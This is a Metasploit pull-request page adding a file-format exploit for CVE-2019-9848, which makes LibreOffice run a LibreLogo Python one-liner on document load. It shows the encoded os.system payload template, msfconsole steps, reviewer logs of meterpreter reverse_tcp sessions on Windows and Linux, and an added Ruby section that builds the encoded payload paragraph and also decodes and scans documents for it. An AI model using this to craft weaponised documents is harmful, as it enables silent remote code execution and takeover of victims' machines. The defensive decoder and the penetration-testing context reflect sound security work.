
Add LibreOffice LibreLogo exec exploit Module (CVE-2019-9848) #12147

Closed
wants to merge 13 commits into from

Conversation

@LoadLow
Contributor

commented Jul 30, 2019

It seems to also work on 6.2.5 (should be tested again) and doesn't require any user interaction after opening the ODT file with a vulnerable LibreOffice (in comparison to the original PoC).

Original PoC from Nils Emmerich

Description

This module exploits CVE-2019-9848 and is based on the module exploiting CVE-2018-16858, written by Shelby Pace.

LibreOffice has a feature where documents can specify that pre-installed scripts can be executed on various document events such as mouse-over, etc. LibreOffice is typically also bundled with LibreLogo, a programmable turtle vector graphics script, which can be manipulated into executing arbitrary Python commands.

By using the document event feature to trigger LibreLogo to execute Python contained within a document, a malicious document could be constructed which would execute arbitrary Python commands silently without warning.

This module generates an ODT file with a dom-loaded event that, when triggered, will execute arbitrary Python code and the Metasploit payload. LibreLogo executes the Python code stored in the text part of the document.

The generated document file contains a one-line Python snippet that calls os.system:

getattr(__import__("os"),"system")("<%= @cmd %>")

but with smart quotes (“os”, because this interpreter accepts them, and why not?) and encoded:

<text:p text:style-name="P8">&#x67;&#x65;&#x74;&#x61;&#x74;&#x74;&#x72;(&#x5f;&#x5f;&#x69;&#x6d;&#x70;&#x6f;&#x72;&#x74;&#x5f;&#x5f;(&#x201C;\x6f\&#x78;73&#x201D;),&#x201C;\&#x78;73\&#x78;79\&#x78;73\&#x78;74\x65\&#x78;6d&#x201D;)(“<%= @cmd %>”)</text:p>

To avoid any Python error, the h1 title written in the document is a Python comment (#).

Vulnerable Application

LibreOffice version 6.2.5 and prior.

This module has been tested successfully with:

  • LibreOffice 6.2.4 on Windows 7
  • LibreOffice 6.2.5 on Windows 7
  • LibreOffice 6.2.4 on Debian 9.9

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/fileformat/libreoffice_logo_exec
  4. Do: set LHOST <ip>
  5. Do: set LPORT <port>
  6. Do: run
  7. Move the generated file to the target
  8. Start a handler
  9. Open the file with a vulnerable version of LibreOffice
  10. You should get a shell.

Scenarios

LibreOffice 6.2.4 on Windows 7

msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set lhost 192.168.33.1
lhost => 192.168.33.1
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

[+] librefile.odt stored at /home/foobar/.msf4/local/librefile.odt
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > use multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.33.1
lhost => 192.168.33.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] Sending stage (179779 bytes) to 192.168.33.102
[*] Meterpreter session 3 opened (192.168.33.1:4444 -> 192.168.33.102:46327) at 2019-07-29 03:33:03 -0400

meterpreter > 

LibreOffice 6.2.4 on Debian 9.9

msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set lhost 192.168.33.1
lhost => 192.168.33.1
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

[+] librefile.odt stored at /home/foobar/.msf4/local/librefile.odt
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > use multi/handler
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.33.1
lhost => 192.168.33.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] Sending stage (985320 bytes) to 192.168.33.117
[*] Meterpreter session 5 opened (192.168.33.1:4444 -> 192.168.33.117:43602) at 2019-07-29 04:44:04 -0400

meterpreter > getuid
Server username: uid=1001, gid=1001, euid=1001, egid=1001
meterpreter > 
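The one-liner and its encoding, worked through as an added example in Ruby (Metasploit's language). This is not the module's code and is not taken from the PR: it reproduces the two layers the description above explains (Python \xNN escapes inside typographic quotes, then XML hex character references), decodes the PR's own <text:p> line back to the plain os.system call, and scans a constructed content.xml for the document-event listener that hands control to LibreLogo. The ODF listener element names, the "dom:load" event name and the LibreLogo script href in the sample document are assumptions, not details the PR states.

```ruby
# Added example (not the module's code, not from the PR). Models the two
# encoding layers the PR description puts on the LibreLogo one-liner and
# reverses them, then scans a constructed content.xml for the document-event
# binding that fires LibreLogo. Assumed, not taken from the PR: the ODF
# <office:event-listeners>/<script:event-listener> shape, the "dom:load"
# event name and the LibreLogo script href used in SAMPLE_CONTENT_XML.

SMART_OPEN  = "\u201C" # “  LibreLogo accepts typographic quotes as string delimiters
SMART_CLOSE = "\u201D" # ”

# The <text:p> line exactly as it appears in the PR description.
PR_SAMPLE_TEXT_P = '<text:p text:style-name="P8">&#x67;&#x65;&#x74;&#x61;&#x74;&#x74;&#x72;(&#x5f;&#x5f;&#x69;&#x6d;&#x70;&#x6f;&#x72;&#x74;&#x5f;&#x5f;(&#x201C;\x6f\&#x78;73&#x201D;),&#x201C;\&#x78;73\&#x78;79\&#x78;73\&#x78;74\x65\&#x78;6d&#x201D;)(“<%= @cmd %>”)</text:p>'

# Layer 1: Python-level \xNN escapes, "os" -> "\x6f\x73"
def py_hex_escape(str)
  str.bytes.map { |b| format('\x%02x', b) }.join
end

# Layer 2: XML hex character references for every character not in `keep`.
# The PR sample leaves some characters literal; any mix decodes identically.
def xml_hex_refs(str, keep: '()\,')
  str.each_char.map { |c| keep.include?(c) ? c : format('&#x%x;', c.ord) }.join
end

# Build the <text:p> that carries the one-liner for `cmd`. The command part is
# hex-encoded in full, so XML metacharacters in it cannot break the document.
def build_oneliner(cmd)
  call = "getattr(__import__(#{SMART_OPEN}#{py_hex_escape('os')}#{SMART_CLOSE})," \
         "#{SMART_OPEN}#{py_hex_escape('system')}#{SMART_CLOSE})"
  arg  = "(#{SMART_OPEN}#{cmd}#{SMART_CLOSE})"
  %(<text:p text:style-name="P8">#{xml_hex_refs(call)}#{xml_hex_refs(arg, keep: '')}</text:p>)
end

# Undo layer 2 (hex and decimal numeric character references).
def decode_xml_refs(s)
  s.gsub(/&#x([0-9a-fA-F]+);/) { [$1.hex].pack('U') }
   .gsub(/&#(\d+);/) { [$1.to_i].pack('U') }
end

# Undo layer 1.
def decode_py_escapes(s)
  s.gsub(/\\x([0-9a-fA-F]{2})/) { $1.hex.chr(Encoding::UTF_8) }
end

# Strip the <text:p> wrapper, undo both layers and normalise the typographic
# quotes to plain ones, which is what LibreLogo does before running the code.
def recover_python(text_p)
  inner = text_p.sub(/\A<text:p[^>]*>/, '').sub(%r{</text:p>\z}, '')
  decode_py_escapes(decode_xml_refs(inner)).tr(SMART_OPEN + SMART_CLOSE, '""')
end

# Every document-event listener whose script href points at LibreLogo.
def librelogo_event_bindings(content_xml)
  content_xml.scan(/<script:event-listener\b([^>]*)>/).flat_map do |(attrs)|
    href = attrs[/xlink:href="([^"]*)"/, 1].to_s
    next [] unless href.include?('LibreLogo')
    [{ event: attrs[/script:event-name="([^"]*)"/, 1], href: href }]
  end
end

# Every paragraph, decoded to the Python LibreLogo would see.
def recovered_payloads(content_xml)
  content_xml.scan(%r{<text:p[^>]*>.*?</text:p>}m).map { |p| recover_python(p) }
end

# Constructed content.xml (not from a real document): listener shape, event
# name and href are assumptions; the heading is a Python comment as in the PR.
SAMPLE_CONTENT_XML = <<~XML
  <office:document-content>
    <office:scripts><office:event-listeners>
      <script:event-listener script:language="ooo:script" script:event-name="dom:load"
        xlink:href="vnd.sun.star.script:LibreLogo|LibreLogo.py$run?language=Python&amp;location=share"/>
    </office:event-listeners></office:scripts>
    <office:body><office:text>
      <text:h text:outline-level="1"># Quarterly figures</text:h>
      #{PR_SAMPLE_TEXT_P}
    </office:text></office:body>
  </office:document-content>
XML

if $PROGRAM_NAME == __FILE__
  puts build_oneliner('id')
  librelogo_event_bindings(SAMPLE_CONTENT_XML).each { |b| puts "listener #{b[:event]} -> #{b[:href]}" }
  recovered_payloads(SAMPLE_CONTENT_XML).each { |code| puts "payload: #{code}" }
end
```

Run directly, it prints the generated paragraph, the listener it found and the recovered Python. The listener scan is the check worth running on an untrusted ODT before opening it: the event binding is what makes the paragraph execute without any user interaction, and the decoder shows what it would run regardless of how the characters were encoded.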

LoadLow added some commits Jul 30, 2019

Adds exploit module for CVE-2019-9848
uses a dom-loaded event (triggered just after opening the document) and is still working on 6.2.5

@LoadLow LoadLow changed the title Adds LibreOffice LibreLogo exec exploit Module (CVE-2019-9848) Add LibreOffice LibreLogo exec exploit Module (CVE-2019-9848) Jul 30, 2019

LoadLow added some commits Jul 30, 2019

@busterb busterb added the module label Jul 30, 2019

@space-r7 space-r7 added the docs label Jul 31, 2019

@cbrnrd
Contributor

left a comment

Awesome work! Just a few stylistic things to clean up, but looks good otherwise :)

LoadLow and others added some commits Aug 3, 2019

Update libreoffice_logo_exec documentation
Co-Authored-By: bcoles <bcoles@gmail.com>
Update libreoffice_logo_exec documentation
Co-Authored-By: Carter Brainerd <0xCB@protonmail.com>
Removes double quotes in libreoffice_logo_exec
Co-Authored-By: Carter Brainerd <0xCB@protonmail.com>
Update libreoffice_logo_exec documentation
Co-Authored-By: bcoles <bcoles@gmail.com>
Update libreoffice_logo_exec documentation
Co-Authored-By: bcoles <bcoles@gmail.com>
@bcoles

Contributor

commented Aug 3, 2019

Is there a reason to use ARCH_CMD payloads rather than ARCH_PYTHON ?

I ask, because this is a file format exploit, and there's no guarantee the user will open the document on the correct platform. Comparatively, if you're already executing native Python code, you could use a Python payload, which should effectively be universal, and execute regardless of the target platform.

@LoadLow

Contributor Author

commented Aug 3, 2019

I have first tried it, but it was not working properly.
Maybe it was related to some characters being handled differently, and because each line of Python must be in its own <text:p> block.

@bcoles

Contributor

commented Aug 3, 2019

each line of Python must be in its <text:p> block.

Perhaps it could be wrapped in an eval() call ? Maybe whoever reviews this PR can take a look during the review process.

@LoadLow

Contributor Author

commented Aug 3, 2019

I was trying with an eval payload but without any success, but yes it could be interesting to target all the platforms with only one document.

@bcoles

Contributor

commented Aug 3, 2019

FWIW, I tested this on Linux Mint 19.

Initial exploitation failed, as the Libre Logo package was not installed by default.


However, upon installation, the exploit worked as described:

msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set disablepayloadhandler false
disablepayloadhandler => false
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.
[+] librefile.odt stored at /root/.msf4/local/librefile.odt
[*] Sending stage (3021284 bytes) to 172.16.191.211

[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.211:43966) at 2019-08-03 00:58:31 -0400

meterpreter > 
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > 
@space-r7

Contributor

commented Aug 13, 2019

Tested v6.2.4 on Ubuntu:

msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set target 1
target => 1
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

[*] File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.
[+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > use multi/handler
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.37.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (985320 bytes) to 192.168.37.137
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.137:42962) at 2019-08-13 12:50:27 -0500

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : 192.168.37.137
OS           : Ubuntu 18.04 (Linux 4.18.0-15-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 

Tested v6.2.5 on Windows 10:

msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

[*] File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.
[+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > use multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (179779 bytes) to 192.168.37.147
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.147:50192) at 2019-08-13 13:12:59 -0500

meterpreter > getuid
Server username: DESKTOP-L5FDSM7\Shelby Pace
meterpreter > sysinfo
Computer        : DESKTOP-L5FDSM7
OS              : Windows 10 (Build 16299).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
@space-r7

Contributor

commented Aug 13, 2019

Hi @LoadLow, I just noticed that you're working off of your master branch. Before I can land your module, could you create a new PR that is based off of a unique branch instead?

This helps protect the process, ensures users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes, and allows contributors to make progress while a PR is still being reviewed.

I'll go ahead and close this PR, and I'll be looking out for the new PR. Apologies for not catching this sooner. Thank you!
